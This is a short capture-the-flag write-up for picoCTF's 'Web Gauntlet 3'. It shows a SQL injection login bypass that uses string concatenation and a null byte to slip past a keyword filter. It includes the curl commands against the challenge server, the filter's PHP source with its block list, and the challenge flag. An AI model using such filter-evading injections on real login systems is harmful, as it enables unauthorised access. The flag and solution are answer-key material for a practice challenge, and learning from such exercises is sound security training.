Web Gauntlet 3
Last time, I promise! Only 25 characters this time. Log in as admin Site: http://mercury.picoctf.net:32946/ Filter: http://mercury.picoctf.net:32946/filter.php
- 1.
- 2.The solution query is
user=ad'||'min'%00
and it can be sent using cURL like so:curl --data "user=ad'||'min'%00&pass=a" http://mercury.picoctf.net:32946/index.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" --output -
The flag can be retrieved using this command:curl http://mercury.picoctf.net:32946/filter.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" | grep picoCTF
. See Web Gauntlet 2 for more information. - 3.The code for the filter and the flag are shown in
/filter.php
when the login is bypassed:<?phpsession_start();if (!isset($_SESSION["winner3"])) {$_SESSION["winner3"] = 0;}$win = $_SESSION["winner3"];$view = ($_SERVER["PHP_SELF"] == "/filter.php");if ($win === 0) {$filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");if ($view) {echo "Filters: ".implode(" ", $filter)."<br/>";}} else if ($win === 1) {if ($view) {highlight_file("filter.php");}$_SESSION["winner3"] = 0; // <- Don't refresh!} else {$_SESSION["winner3"] = 0;}// picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}?>
picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}
Last modified 6mo ago